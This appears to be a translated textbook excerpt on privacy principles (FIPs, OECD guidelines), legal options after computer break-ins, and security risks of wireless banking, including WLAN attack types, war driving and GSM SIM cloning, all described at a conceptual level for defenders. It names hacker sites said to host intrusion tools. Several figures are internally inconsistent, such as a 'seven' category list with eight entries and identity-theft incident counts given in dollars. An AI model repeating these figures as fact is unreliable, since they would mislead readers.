Lawmaking, Drafting Government Regulations, and Privacy Policies

Overview

This chapter reviews how public business policy is drawn up for non-profit and government institutions in a networked world. We will see examples of legislation to protect citizens, customers and children from identity theft, fraud and indecent material. Part Four discusses the legal issues of cyberspace in more depth; in this chapter our emphasis is more on organizational responsibility in the public sphere.

Privacy policies

What standards should organizations and Internet companies that do business follow when collecting information that makes it possible to identify users?

Business and customer relations in the digital world

Online merchants obtain a great deal of information about their customers. An online store knows which product you are looking at, which product you add to your shopping cart and later remove, and which product you finally buy online. Online merchants also know whether you are shopping from home or from work, and if they wish they can find out the remaining credit on your card. Moreover, unlike in the offline world, an online merchant can correlate your purchase history with your browsing habits, and by making such correlations across the data of a wide range of customers, discover valuable patterns of behavior.

ISPs are able to learn even more about their customers, because everything an Internet user sees must first pass through the ISP's computers. ISPs can also identify the web sites their users visit and even the articles they have read. They can even analyze people's e-mail by the keywords used in the text. By tracking and analyzing this information, an ISP can tell, for example, whether its users are interested in travelling by boat or by car, whether or not they care about fashion, and whether they show an interest in treatment for a particular illness.

In the United States, consumer rights were first explicitly addressed in the Fair Credit Reporting Act (passed in 1970). The Act recognized basic consumer rights, such as the right of consumers to see their own credit reports, the right to know who sees reports about them, the right to require reporting organizations to investigate errors discovered by consumers, and the right to require organizations to attach a statement from the consumer to disputed reports. In 1973, at a time when personal data was increasingly being held on computers, the Code of Fair Information Practices was issued to uphold consumer rights.

The Code of Fair Information Practices [118]

The Code of Fair Information Practices is based on five principles:
• There must be no personal data record-keeping system whose existence is secret.
• There must be a way for a person to find out what personal information about them is recorded and how it will be used.
• There must be a way for people to prevent their personal information from being used for purposes other than those they were told about.
• There must be a way for a person to correct information about them that identifies them.
• Any organization that creates, maintains, uses or disseminates records of personally identifying data must assure the reliability of the data for its intended use and must prevent misuse of the data.

[118] Source: US Department of Health, Education and Welfare

The US Congress went on passing laws regulating the use of personal information. Over time, banking records, telephone records, Internet records, cable television subscriber records, health records, educational records and even video rental records all came under US congressional legislation. However, each piece of legislation creates different protections and is enforced by a different part of government. Some offenses, such as those covered by the Antijunk-Fax Telephone Consumer Privacy Act, could not be prosecuted without a complaint from a private plaintiff. In Europe, however, things were different. Based on the experience of the Second World War, during which a great deal of personal information was misused by the Nazis, most European states chose to use dedicated institutions to regulate the collection and use of personal information. The Europeans generalized the ideas set out in the Code of Fair Information Practices into an overall regime known as data protection.
Guidelines of the Organization for Economic Cooperation and Development
In 1980 the Organization for Economic Cooperation and Development (OECD)[121] adopted a set of privacy guidelines and issued them. Part of these guidelines was designed to harmonize the growing body of privacy regulation in the industrialized countries. The guidelines were designed specifically to address the growing problems of transborder data flows, that is, the movement of personal information from a country where personal data is strongly protected to another country where personal data enjoys less protection. The OECD Guidelines on the Protection of Privacy and Transborder Flows of Personal Data consist of eight principles:
Collection Limitation Principle[122]
There should be limits to the collection of personal data. Any personal data should be obtained by lawful and fair means, under appropriate circumstances, and with the knowledge and consent of the individual to whom the information relates.
Data Quality Principle[123]
The personal data collected should be relevant to the purpose that was declared for the use of that information, or to areas related to that purpose. The data should be kept accurate, complete and up to date.
Purpose Specification Principle[124]
The purpose of collecting personal information should be specified at the moment the data is collected, and not later. Subsequent uses of the collected information should be limited to those same purposes; if later purposes are not compatible with the original ones, the change of purpose must be declared explicitly, and the individual's consent to the use of his or her information for the new purposes is also required.
Use Limitation Principle[125]
Personal data should not be disclosed, made publicly available, or used for purposes other than those that were declared (as described in the preceding principles), except:
o with the consent of the individual who owns the information; or
o with legal authorization.
Security Safeguards Principle[126]
Personal data should be protected by appropriate security safeguards against risks such as loss and unauthorized access, destruction, modification, disclosure and use.
Openness Principle[127]
There should be a general policy of openness about practices and policies, with particular regard to personal data. Means should exist that can readily establish the nature of the personal data, the main purpose of its use, and the usual period for which it is retained.
Individual Participation Principle[128]
Everyone should have the right to:
o find out whether or not the data collector holds information about him or her;
o be in contact with the collector of the information relating to him or her: within a reasonable time, at low cost, in a reasonable manner, and in a form in which the information is clear to him or her;
o ask for the reason if one of the above requests is refused, and be able to challenge that refusal; and
o be able to dispute the information relating to him or her and, if the dispute succeeds, be able to have the information deleted, corrected or completed.
Accountability Principle[129]
Every data collector should be accountable for complying with the principles stated above.
The OECD guidelines carry no force of law; instead, these eight principles are used as a guide when the laws of each member country are reviewed.
For a simple checklist of information-protection criteria, which should be applied when information about customers is collected through a website, see Chapter Eleven of this Part of the book.
121 Organization for Economic Cooperation & Development
122 Collection Limitation Principle
123 Data Quality Principle
124 Purpose Specification Principle
125 Use Limitation Principle
126 Security Safeguards Principle
127 Openness Principle
128 Individual Participation Principle
129 Accountability Principle
Chapter Nine
Computer Crime
Overview
We hope you will never be forced to act on the information in this chapter. You may have studied this book with great diligence and taken every important step to keep your system secure, and yet your system may still be misused. Perhaps someone who used to be your employee uses an old account to break into the system and delete some records. Despite all your efforts to prevent break-ins, someone in a foreign country may manage to get into your system. In that situation, what evidence will you have to present to a court? One can also ask what legal risks threaten you while you use the system normally. What do you do if you become the target of a lawsuit? This chapter tries to shed light on these questions. What is said in this chapter should be treated only as general advice and not as legal advice; for further detail and finer points you must ask good lawyers and experienced legal advisers to guide you according to the laws of the country where you live.
Legal Options After a Break-In
If your computers are damaged by a break-in, the legal system of the country where you live may offer several options that you can use. This chapter cannot help you with the precise use of the various aspects of the law, because there are great differences among the laws and legal systems of different countries. In this chapter we therefore do not go beyond the laws of the United States.[130] Worldwide access to the Internet has nevertheless made laws that do not originate inside the United States necessary.
Before any decision to begin legal proceedings, consult a competent lawyer. Because legal approaches carry risks and difficulties, you should be sure that you want to go ahead before you begin legal action.
In some cases you may have no choice and be obliged to take legal action. For example:
• If you want to file a claim with your insurance company to recover the damage caused by a break-in, the insurance company may require you to take legal action against the intruders.
• If you process special or classified information, government regulations may require you to investigate suspicious activity and report on it.
• If you become aware of an illegal activity and do not report it, you will be liable in law as an "accessory to the crime", especially if your computer was also used in that illegal activity.
• If your computer is used to carry out unauthorized and improper acts and you do nothing about it, a criminal complaint may be filed against you for the damage caused.
• If you are the executive of a state-owned company and decide not to investigate and pursue illegal activity, your company's shareholders can bring a suit against you.
• If you are the executive of a private company, then even if the company has no shareholders, partner companies, sponsors or customers may file a complaint against you, depending on each country's computer-crime laws.
130 A more extensive discussion of legal issues in the United States can be found in the book "Computer Crime": A Crimefighter's Handbook (O'Reilly). We recommend that you consult this book if you need further explanation of the matters we refer to in this chapter. The book is no longer printed, but copies and old editions of it are available.
If you work in a company and know that your system is seriously at risk, you should as a rule talk to your organization's legal counsel as part of security planning (before a security incident occurs). Organizations adopt different policies depending on whether or not law enforcement is to be involved. By rehearsing crisis-time activities, increase the likelihood that the policies will actually be followed when they are needed.
By way of introduction, this section reviews several issues that you too will very probably face one day:
Filing a Criminal Complaint
In the United States, whenever you believe that someone has broken the law you can take legal action against that person, and this process begins with filing a complaint with the official authorities. Permission is then obtained from the prosecutor to investigate on the basis of the allegation and, if a crime is identified, to draw up an indictment on that basis.
In some cases, and perhaps in most, a criminal investigation produces no result for you. If the illegal acts are not repeated and the intruder has left no trace, or if your system was attacked from a foreign country, it is very unlikely that you will be able to identify and arrest the intruders. Professional intruders rarely leave a trace.[131]
Filing and submitting a complaint does not necessarily lead to prosecution. The relevant prosecutor (at the national, state or local level) decides on the law that was violated, the severity of the crime, the need for trained investigators to take part, and the type of conviction. Keep in mind that the judicial system is full of cases of every kind. New cases are therefore likely to be investigated only if they concern particular crimes or serious threats. For example, an investigation is far more likely in a case in which $200,000 of data was destroyed than in one in which someone repeatedly scans your personal computer over a modem.
Information about the investigation may or may not be given to you. You may even be given incorrect information while the investigation is under way; for example, you may be told that there is no investigation at all while the investigators are hard at work.
An investigation may put you in a precarious position. If unknown persons continue to break into your system, the authorities may ask you to leave your system open so that investigators can trace its connections and gather evidence for arresting the suspect. Unfortunately, leaving the doors of your system open after it has become clear that your system is being misused can, if the intruders use your system to do damage to other systems, expose you to a third-party lawsuit, because cooperating with law enforcement does not prevent charges from being brought against you. It is therefore better to examine every aspect of the matter thoroughly before accepting such risks.
131 Of course, very few intruders are really as smart as they think they are.
Contacting the Relevant Authorities
Where computer crime is concerned, and depending on the kind of legal and criminal system that exists in your country, you may need to take particular steps to contact local or national officials. Some general recommendations are given below, but naturally they will be more effective if you apply them in the manner appropriate to your own country.
• If possible, it is better to go first to the local or provincial authorities. If the provincial authorities decide that the matter can be investigated better by national agencies, they will suggest that you approach those agencies. Unfortunately, however, some local law-enforcement offices have no interest in using the assistance of national agents. This may mean that your security incident is not investigated properly.
• Local authorities may be more interested in pursuing your complaint, because your problem is most likely not sitting alongside thousands of other similar cases (as many as exist at the national level). Local officials are therefore more likely to attach importance to your problem, even if it is a very small one.
• Although some local officials may be highly skilled in computers and computer crime, even in the United States local officials generally have less experience than state and national officials, and they may find it difficult to carry out advanced investigations. Many national agencies, by contrast, have experts who can quickly be brought in to help solve problems.
• In the United States, state authorities show more interest than national authorities in pursuing and uncovering crimes committed by youths and juveniles. If you know that you have been attacked by a juvenile who lives in your own state, it is better to turn to the local authorities. Sometimes it is also better to set legal action aside and speak directly with the young attacker's parents or teachers (or to ask a lawyer or the police to do this for you).
Hazards of Prosecuting Suspects
Seeking help from the legal authorities brings many potential problems, and these are not limited to matters such as the authorities' experience of working with computers and networks or of prosecuting computer crime. Sometimes authorities who lack sufficient knowledge and experience of computers may invite you to cooperate so that they can understand the points of the case. In other cases they may disregard your information in order to cover their own lack of knowledge and to keep the credibility of the law-enforcement agencies from being called into question. It should be noted that in many cases there is a possibility that the victim also played a part in the criminal activity. In the real world an experienced investigator does not place complete and unquestioning trust in the victim's statements, and this holds for crimes in cyberspace too.
If you and your employees are asked to take part in the investigation to help clarify the matter, make sure that this is done by order of the court; otherwise it may appear that you were eager to be a victim. It is better to put forward a neutral person to work with the representatives of the police and the law-enforcement agencies.
The manner and conduct of law enforcers occasionally cause serious problems. Some of your equipment may be seized for unjustifiably long periods on the pretext of examination or inspection, even if you yourself are the victim of a computer crime. If you were the victim and reported the security incident yourself, the authorities usually keep you informed of their efforts in order to keep your dissatisfaction to a minimum. If, however, the intruders are your own employees, or sensitive matters such as official and military information are involved, you may have no control over the way in which your systems and storage media are examined or over how long the examination takes. The problem becomes more acute when the investigators on the case also need the cooperation of specialists from outside their local offices. Be sure to calculate the downtime caused by the compulsory conditions of the investigation, because this time and the losses that result from it can be counted as part of the damage incurred during the prosecution and can subsequently be used in any civil suit (suits that can be filed against the attacker and sometimes also against the law-enforcement agencies themselves).
During an investigation, backup copies are a very valuable resource. In addition, if necessary you can use backup systems while your main systems are under inspection and examination.
When you cooperate with law-enforcement agencies in an investigation, the computing community's view of you may turn negative because of the heavy-handedness and ineffectiveness of that investigation. Most computer users have a negative view of law enforcers, and if you are placed in that position these feelings will be directed at you too. Such judgments can lower your standing in public esteem below what you deserve and can prevent you from cooperating not only with that investigation but also with other professional activities. In addition, after the investigation has ended you may become the target of electronic attacks or other abuse.
This behavior is regrettable, because many investigators are in any case careful and professional, and they may really need a meticulous investigation in order to stop a suspicious activity or a persistent attack. Today we can say that this problem has diminished in recent years and that concern about it has decreased compared with the past decade. With the passage of time, and as people become more aware of the damage done by intruders (even those who had no malicious intent), these negative feelings toward the legal authorities are expected to fade still further.
Our strong recommendation is that you think carefully and examine every aspect of the matter when you decide whether to bring any security problem in your system to the legal authorities. In most cases it is better to weigh when going to the judicial authorities is necessary: when you have really lost something and suffered harm, or when you are personally unable to control the situation that has arisen. Sometimes the uproar that results from an incident is more dangerous than the other losses that follow from it.
Once you have decided to seek help from the legal authorities, avoid making a fuss about it. In some cases the involvement of the legal authorities can discourage intruders, but in other cases it can put you at the center of their attention and so expose you to more attacks. Be aware that your present problem may be part of a wider problem that is developing and spreading, and that if you do not manage it properly it may cause a great deal of damage to you and to others.
We would like to take an optimistic view of this subject. The legal authorities are generally aware that they need to raise their level of skill in investigating computer crime, and they are usually working to set up training centers, to provide forensic-analysis organizations and facilities, and to employ other tools for carrying out effective investigations. In prosecutors' offices (especially in the more developed parts of the country) some investigators and prosecutors usually gain a great deal of experience, and they should therefore strive to pass their knowledge on to their other colleagues. In recent years the result of this process has been a fundamental improvement in the level of success of law-enforcement work and a large number of successful investigations and prosecutions in the field of cybercrime. It is well to keep in mind the countless benefits of reporting computer crimes, not only for yourself but for the whole of society: successful prosecutions can prevent later misuse of your systems and of other people's.
Responsibility to Report Crime
Finally, remember that a crime is prosecuted only if you have reported it. Otherwise this does not happen, which benefits neither you nor anyone else, and it leaves the intruder free to inflict more damage, and to inflict it on other people. Remember that what you have encountered may be part of a huge set of computer crimes and acts of sabotage. Without the necessary investigation it is impossible to say whether what happened to you was an isolated incident unrelated to other parts of the system or part of a larger attack.
Another problem with failing to report serious computer crimes is that some people will wrongly imagine that such crimes rarely occur and will therefore regard the likelihood of these problems in their own systems as negligible; little emphasis will be placed on budgeting for and training new enforcement officers; little effort will be made to improve existing laws; society too will pay less attention to matters of this kind; and, in short, the result will be that the computing environment becomes more dangerous for everyone in it than it might appear.
Extra Caution...
This section summarizes further suggestions for preventing possible misuse of computers:
• In the text of your programs and computer data, place your copyright and proprietary-ownership information at the very beginning of each file. If you have referred explicitly to copyright, be sure to provide for a special form on this matter to be filled in for each customer. Doing so can help with a more precise investigation and with the recovery of damages.
• Make sure that users are fully aware of the dos and don'ts of their activities and of their responsibilities.
• Inform all users of everything that is monitored on your network (provided that doing so does not violate your policies). This monitoring can include e-mail, keystrokes and access to files. If no warning is given about the monitoring, even monitoring the actions of an attacker may be regarded as a violation of privacy laws.
• Make good backup copies and keep them in a safe place. If these copies have to be compared with one another to establish the truth, you must be able to identify the people who have had access to the copies. Keeping backups in public areas means that they cannot later be used as evidence.
• If you observe anything suspicious, or an event that calls for the involvement of the judicial authorities, start taking notes. Write down your observations and actions and the time of each one. Make printed copies of log files and traces and attach them to your notes. During inspections and investigations, a written record of the events that took place can be very valuable. Also record the time and subject of every contact with the legal authorities.
• Try to define in writing the levels of authority of all employees and users, and include in these definitions everything to which each person has lawful access (and also everything to which that person does not have access). Devise a mechanism for communicating these definitions to people so that everyone can understand and apply them well and can also grasp the limits that follow from them.
• Tell your employees explicitly that they are required to return all resources that have been in their possession (such as program source code and manuals) at the end of their employment or whenever they are asked to do so.
• If something has happened that in your view calls for a police investigation, do not allow staff to carry out investigations on their own initiative. Such efforts may cause some evidence to lose its evidentiary value in the official investigation. Investigators may also form a negative view of you when they see that you have interfered in the investigation.
• Require your employees to sign an agreement about their responsibilities with regard to sensitive information, computer use, the use of e-mail, and other computer matters that may arise later. Make sure that the policies are explicit and fair and that all employees are aware of them and have signed the relevant agreement. State clearly that all access and access rights end when the period of employment ends, and that any unauthorized access during or after the period of employment will be prosecuted.
Criminal Hazards in Business
If you are an ISP or a website, or if in any other way you have computer networks at your place of work, you yourself may be prosecuted if your machines are misused.
If the judicial authorities conclude that your computers were used by an employee to break into other computers, to transmit and store restricted information (such as trade secrets, child pornography, and so on) or to take part in computer crimes, your computers may be seized under a seizure warrant so that they can be examined. If during the investigation you can prove that the employee's access to your system was limited, the scope of these seizures may be reduced, but even so some of your machines will most likely remain impounded while the official investigation is carried out.
Depending on the procedures accepted in each country's legal system, if the local police or national authorities believe that there is evidence of a violation of the law, they ask a judge for a warrant to carry out a search, and the judge issues the search warrant. In recent years a number of U.S. federal investigators and officials have, in some states, established a pattern of carrying out broad and heavy-handed investigations. One reason for this is that law-enforcement agencies lack sufficient experience in dealing with computer crime, a situation that seems likely to improve over time as this and similar work is carried out.
Extra Caution...
• Equip yourself with network-monitoring and keystroke-monitoring systems. This software can monitor and record all information that is sent or received. If you sense that you have been broken into, start monitoring and recording at once and do not wait for a court order, because law-enforcement officers usually cannot, without the permission of a court, authorize you to act as an agent of the law, and obtaining a judge's order that grants the court's permission may also take a long time.
• With the help of your lawyer and your insurance company, draw up contingency plans for the actions, the related investigations and any other related activity that you must carry out when a break-in occurs.
• Identify those law-enforcement officers who are qualified to investigate potential problems; introduce yourself to them, and share your concerns with them before an incident occurs. If in the future you run into a problem in which you need the help of law-enforcement agencies and the police, even a very basic acquaintance with these people can be extremely useful.
• Do not forget to join communities and organizations that continually provide awareness and training on security so that people's expertise in this area increases.
Chapter Ten
Mobile Risk Management: Electronic Financial Services in the Wireless Environment[132]
Overview
In this chapter we examine the risks that arise from the use of wireless technologies in financial services and that threaten electronic security through identity theft, the hijacking of system activity, and other similar actions. The chapter makes clear that although the "volume" of transactions carried out in the environment affects how extensive the necessary security measures must be, the mere use of wireless technology can also expose security weaknesses. The chapter points out several important steps that system administrators (especially in banks) can take to reduce risks as far as possible, usually without a large increase in final cost. The risk-reduction measures proposed in this chapter also take in, to some extent, the best practices that exist in delivering financial services based on wireless technology.
Wireless Technology in New Industries and Sectors
The rapid growth in the use of wireless technology in many emerging financial-services markets has made close attention to electronic-security issues in this technology necessary. In emerging markets this issue is nowhere as important as in the area of wireless technology, which has driven the spread of mobile telephony in these markets. The harder countries work to use this technology to deliver financial services, the more vital it becomes to pay attention to the potential security risks of wireless technology and to how well business partners in the market and system administrators in banks and other service institutions can ensure security. The purpose of this chapter is therefore to explain why and how electronic security becomes a concern, and how these risks can be reduced without imposing additional cost on the providers of financial services. Given the very important point that very rapid changes in technology have deprived the administrators of financial-service systems of the possibility of offering fixed and unchanging solutions, many of the measures recommended in this book concern layered security in wireless financial-service applications, and they represent what are recognized today as best practices in electronic security.
This chapter is divided into the following parts: Part A introduces the reader to the broad range of applications of wireless technology and electronic financial services around the world; Part B introduces the inherent risks of wireless technology; Part C describes the weaknesses of wireless local area networks (WLANs)[133] and the risk-reduction procedures needed to secure them; Part D deals with the evolution of Global System for Mobile Communications networks (GSM networks)[134] and the vulnerabilities found in them; Part E explains in detail the proper ways of dealing with the risks of GSM networks; Part F presents best practices for risk management in the delivery of payment services; and Part G offers a final summary and an outlook on the future (third generation; 3G).
The aim of this chapter is to present a set of risk-management and security approaches for banks and payment systems. The chapter tries to provide a framework for assessing security risks that can be applied in the wireless environment.
132 See the World Bank paper by Tom Kellerman entitled: "Mobile Risk Management: e-Finance for the Wireless Environment (2002)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Publications
133 Wireless Local Area Networks
134 Global System for Mobile Communication Networks
A. Overview of Electronic Financial Services[135]
Electronic financial services, whether delivered over the Internet or through remote mechanisms, have grown rapidly. Countries and consumers are becoming connected to one another at an increasing pace. These technologies not only expand the set of countries that are part of the network but also create new ways of delivering financial services. Since the mid-1990s, the banking industry's investments in raising customer satisfaction have focused on Internet banking. Electronic financial services have led to lower costs for financial services. In addition to saving on the fixed costs of developing and maintaining branches, the Internet has eliminated many redundant steps and reduced costs. Carrying out an ordinary transaction through a branch or by telephone costs the equivalent of one U.S. dollar, whereas carrying out the same transaction over the Internet costs the equivalent of $0.02. The low cost of Internet financial services has led to their widespread use. In emerging markets, Internet-based services are sometimes as common as they are in industrial ones. Internet banking in Brazil, for example, has spread as it has in the United States. Because most developing countries lack suitable fixed-line infrastructure, most financial institutions have implemented their services on wireless platforms in order to extend access to them. Alongside these realities, four trends connected with the new technology have emerged in the industry: outsourcing, open architecture, integrated strategies, and new methods of electronic payment.[136]
135 For a more detailed analysis of electronic security, see the following source by T. Glaessener, T. Kellerman and V. McNevin (2002): "E-Security Risk Mitigation for Financial Transactions"
136 Gilbride, Edward. Emerging Bank Technology and the Implications for E-crime Presentation, September 3, 2001

Electronic financial services consist of four main parts: electronic funds transfers (EFT),[137] electronic data interchange (EDI),[138] electronic benefits transfers (EBT)[139] and electronic trade confirmation (ETC).[140] EFT is in fact the oldest form of electronic money transfer and has been in common use since the early 1960s. Globally, a very large volume of EFT takes place within and between banks; the US Treasury estimates it at about 2 trillion dollars a day, or 700 trillion dollars a year. A large share of bank EFT over the SWIFT network is carried on international satellite links. At present about half of the world's 200 countries obtain their Internet connectivity and their large domestic networks through satellite links. Although most of these countries are economically developed, this results in heavy traffic and a large volume of economic activity, and it is a major concern from the standpoint of security vulnerabilities.[141] By 2005 the share of Internet banking will grow from 8.5% to 50% in industrial countries and from 1% to 10% in emerging markets. With better connectivity in emerging markets, Internet banking transactions could rise to 20% in 2005, which would amount to more than six trillion dollars of business-to-business (B2B)[142] Internet transactions.[143]

[137] Electronic Funds Transfers
[138] Electronic Data Interchange
[139] Electronic Benefits Transfers
[140] Electronic Trade Confirmation
[141] Dr. Joseph N. Pelton, "Satellite Communications 2001: The Transition to Mass-Consumer Markets, Technologies, and Systems".
[142] Business To Business
[143] Jupiter Communications, 2001

Alongside the growth of electronic financial services, another trend is taking shape: the ever wider use of wireless communications in both developed and developing countries. This relatively new medium is fast becoming the main medium for e-commerce and electronic financial services. The shift of businesses from paper-based systems to Internet-based platforms has been profound. As the platform for all kinds of services moves from landlines to wireless technologies with wider access, the negative effects of this phenomenon grow as well.

Mobile devices are today regarded as the leading edge of the world's technologies. In 1990 there were only eleven million mobile phone subscribers in the whole world.[144] By 1999, with the spread of wireless technologies, this figure had passed five hundred million, and it is now roughly twice that. Comparable statistics for developing countries clearly show the leap brought about by mobile devices.[145] Cambodia, which had lost its fixed-line network after some 20 years of civil war, was able to re-establish its communications using wireless technology. Within a year of the introduction of wireless technology, mobile phone subscribers outnumbered fixed-line subscribers. Although Cambodia has one of the lowest per-capita incomes in the world, it has overtaken 31 countries in overall telephone penetration, including some with far higher incomes. Instead of spending large amounts of resources and time on building fixed-line infrastructure, countries have replaced these wired structures with inexpensive mobile phone towers, which are also simpler to build. These developments have, however, brought a number of security risks with them, some of which are very serious.

Continued economic development and new ways of delivering financial services, such as wireless protocols, have made it possible for banks to offer financial services remotely; but these opportunities are not limited to the formal economy. Alongside these advances, the global underground and criminal economy has also adapted well to technology. Delivering financial services over wireless media has created opportunities for identity theft, fraudulent funds transfers, and extortion.

[144] Box 1 of "E-Finance in Emerging Markets: Is Leapfrogging Possible?", Claessens S., T. Glaessner, D. Klingebiel, 2001.
[145] Part one of the book "E-Finance in Emerging Markets: Is Leapfrogging Possible?", 2001, by S. Claessens, T. Glaessner, D. Klingebiel.

B. Risks of electronic financial services in wireless networks

Alongside the many benefits of new technology, risks have also arisen, because technology makes new methods of fraud and theft easier too. Identity forgery, remote access, and high-quality printing of images of securities now exist in the Internet world, and multipurpose tools and platforms make them easier to carry out. With the spread of dial-up ATMs,[146] which make cash available in developing regions, criminals are able to tamper with the wireless link between the ATM and its parent bank and capture all of the dial-up ATM's incoming and outgoing exchanges. Online intrusion was at first a complex specialism, but the information age has paved the way for the spread of underground hacker websites, which today support computer fraud by offering various tools for breaking into economic infrastructure. For example, sites such as www.astalavista.box.sk and www.attrition.org carry malicious programs and viruses that allow novices to break into banking systems. The Internet Data Center (www.idc.com) recently reported that more than 57% of all attacks in the past year were directed at the financial sector.

The traditional risks of past years have changed. Historically, fraud has always involved the abuse of printed documents or the abuse of people, but the electronic environment has created new opportunities for economic crime. In 2001 more than a quarter (27%) of banking and financial databases were breached.[147] Eastern European hacker gangs have broken into hundreds of banks around the world. In organized crime, hacking is now treated as a business model.

[146] Dialup ATM
[147] Evans Data Corp. Survey

The FBI's computer crime division has stated that most banks pay the ransom for fear of disgrace and of losing customers. Last year's Egghead extortion is a well-known example, in which hackers attacked a database containing ten thousand credit card numbers and demanded a large sum from the company in return for not publishing the numbers in an Internet chat room. After that, on Christmas Eve, they also deducted a small amount from the balance of each card. The problem therefore goes beyond financial and reputational matters. One forecast suggests that identity theft incidents in the United States will more than triple, from 700,000 dollars[148] last year to 1.7 million dollars in 2005, and that the cost to businesses will rise by 30% to exceed 8 million dollars in 2005.[149]

Cybercrime has grown markedly. Attacks on servers doubled in 2001 compared with 2000, and about 90% of the companies surveyed had been infected by viruses and Internet worms despite having various antivirus products.[150] The 2001 CSI/FBI survey on computer crime and security showed that intrusions caused more than 377 million dollars in losses.[151]

The main reason these incidents are not dealt with properly around the world is fear of the news getting out.[152] Financial companies, worried about damage to their public image, are afraid to report the harm and losses they suffer, and as a result prefer to remain vulnerable. If it becomes known that a business has been the target of computer fraud, customers may lose confidence and no longer be willing to have their information stored in that business's databases. Providers of economic services must control their systems in a way that guarantees their security. The wireless medium, which is expanding all over the world, is not a secure medium. The remarkable haste with which countries are adapting to wireless technology has created great confusion.

[148] This statistic reflects only the annual trend in the United States.
[149] These results were published in a 2001 report by Celent Communications, which used FTC data.
[150] http://www.infosecuritymag.com/articles/october01/images/survey.pdf
[151] James Savage, at that time a special agent in the Secret Service's financial crimes division, said: "These statistics point to serious problems in critical infrastructure, because they mean that the business community is willing to admit that it has been harmed in this respect". He believes that these statistics reflect only a small part of the real harm done to the US business community. (3 October 2003)
[152] Cornelius Tate, special agent at CERT, describes this tendency to avoid reporting incidents as follows: "I think financial losses are greater than what is reported. In my experience there are companies that are unwilling to report the losses caused by being broken into. In my view, year after year a large increase can be seen in companies' losses from such harm, because companies have increasingly come to the conclusion that anyone may be the target of an attack, and being a victim of attacks has gradually become accepted, so that publishing news about it no longer causes the loss of public confidence that it once did."

C. Wireless local area networks

Wireless networks are currently available in three forms: wireless LANs that use the 802.11b protocol; CDMA/TDMA/GSM networks (mobile phone and PCS) used by wireless phones and PDAs; and high-power microwave systems used by telephone companies to carry information over long distances. Although all three are in common use around the world, they share one fundamental security weakness: the use of radio frequency (RF) to transmit information, which can lead to disclosure of the transmitted data.

Wireless networks have spread explosively. Low cost, ease of installation and continuous connectivity have driven their rapid spread, particularly in financial services institutions. It was in fact assumed that wireless networks would serve the same purpose as traditional networks, only without cables. These networks are spreading because of their convenience for users; they are currently offered in the United States under the IEEE 802.11 standard and in Europe under the GSM standard. When wireless networks are designed, there are important security concerns that must be addressed.

Seven primary categories of security risk can be identified for wireless networks:[153]

1. Insertion attacks:[154] the intruder tries to insert "data" into your network through an insecure mobile access point.[155]
2. Session hijacking:[156] also known as "man in the middle", this arises from the fact that in wireless phone systems the phone authenticates itself to the base station, but the base station does not do the same for the phone; a wireless session between the phone and the base station can therefore be hijacked without the phone being able to notice, and all that is needed is to imitate a base station.
3. Jamming: a type of denial-of-service attack in which the intruder, by scattering data and broadcasting[157] on your network's operating frequency, tries to flood[158] the wireless network's radio frequency spectrum.
4. Encryption attacks:[159] wireless networks based on IEEE 802.11 use the WEP[160] algorithm for encryption. The encryption method and the initialization vectors of this standard are very weak and have been broken many times.
5. Traffic interception and monitoring: the approximate range of mobile access points in the 802.11b standard is about 300 feet. This means that anyone with suitable equipment who is within range of the transmitted packets will be able to receive them. Equipment for amplifying the signal and extending this range is also readily available, so the area in which traffic can be intercepted is large and hard to secure.
6. Mobile node to mobile node communication: most mobile nodes (such as laptops and PDAs) can communicate directly with one another if file sharing or any TCP/IP service is enabled on them. This means that any mobile node can transfer a dangerous file or program across your network.
7. Misconfiguration: any device, service or application that is not configured correctly puts the whole network at risk. Many wireless devices and applications are configured by default to accept any request for service or access. This means that any arbitrary mobile client can request a telnet or ftp session and receive a response.
8. Brute force attacks: most wireless access points use a single key or password shared by all devices on the network. This leaves wireless networks exposed to brute force attacks (for example, dictionary-based ones).

War Driving

Industrial espionage and white-collar crime have reached new heights with the advance of new technologies. War dialing, meaning calling all of an organization's phone numbers to find the numbers of its modems, has given way to war driving. This new term means searching for the wireless LANs of businesses and recording their network traffic with a laptop. According to Dave Thomas,[161] a senior investigator in the FBI's computer crime division, war driving is a growing phenomenon that threatens the security of every company and institution that has a wireless LAN.

[153] This classification comes from a member of the CERT analysis center.
[154] Insertion Attacks
[155] Mobile Access Point
[156] Session Hijacking
[157] Broadcasting
[158] Flooding
[159] Encryption
[160] Wired Equivalent Privacy
[161] Dave Thomas

When configuring and deploying a wireless LAN, a network administrator may observe that laptops can connect to the network only within a limited distance of the access points, and conclude that the network's signals cannot be reached beyond that distance; but this assumption is wrong. In fact the signals can be received over thousands of metres, as long as nothing deflects or interrupts them. The reason for the mistaken reasoning is that a laptop's small antenna cannot pick up weak signals; with an external antenna, however, the reception range can be extended. The wireless part of a network is usually such that an intruder needs no physical access to anything in order to reach its traffic. For this reason these networks are weak against attacks such as message theft, message modification, or jamming between messages.

These issues make clear the importance of addressing security in wireless networks. Each of the weaknesses above can be minimized or eliminated through appropriate use of security policies and practices, network design, security applications and correct configuration of security controls. The final chapters of Part Three provide information on how to secure wireless LANs.

D. The mobile phone standard in Europe: GSM

GSM is the most widespread and fastest-growing digital mobile phone standard in use in the world. There are currently close to 600 million GSM subscribers worldwide, more than two thirds of all the mobile devices in the world.[162] This number is growing at a rate of four new users per second. GSM coverage spans every continent, and it is the technology used by 400 service providers in more than 170 countries. But this is only the beginning of the wireless technology revolution.

Industry researchers predict that by the end of 2005 there will be about 1.4 billion GSM users. GSM phones contain a small smart card that stores the phone's details and is known as the subscriber identification module (SIM).[163] The SIM has to keep these details confidential and encrypted; the SIM card can therefore be seen both as a strength and as a security weakness of GSM technology.

GSM weaknesses

SIM card vulnerabilities

In American and European GSM systems the method of accessing the network is the same. Removable smart cards in phones (SIM cards) are used to hold phone numbers, account information, and add-on software such as a web browser. The data stored on the cards is encrypted, but the COMP128 algorithm used for this has already been broken, so these cards are not safe against cloning (making an identical copy of the card). War driving is not a dangerous problem for subscribers of mobile phones that use the GSM standard. Regardless of the frequency band, mobile phone signals can easily be disrupted by jamming. There is a very well-known method for obtaining the encrypted GSM conversation key[164] in less than a second using a personal computer.

[162] The North American GSM system currently operates at 1900 MHz when used with personal computer services. The GSM data services are SMS (Short Message Service), CSD (Analog Cellular Switched Data), and GPRS (General Packet Radio Service). Most mobile phone operators use a variant of GSM that operates at either 900 MHz or 1800 MHz. In addition, European countries can use High Speed Circuit Switched Data (HSCSD), which can combine several communication channels into one channel capable of 38.4 kbps. GPRS is available in most countries.
[163] Subscriber Identification Module
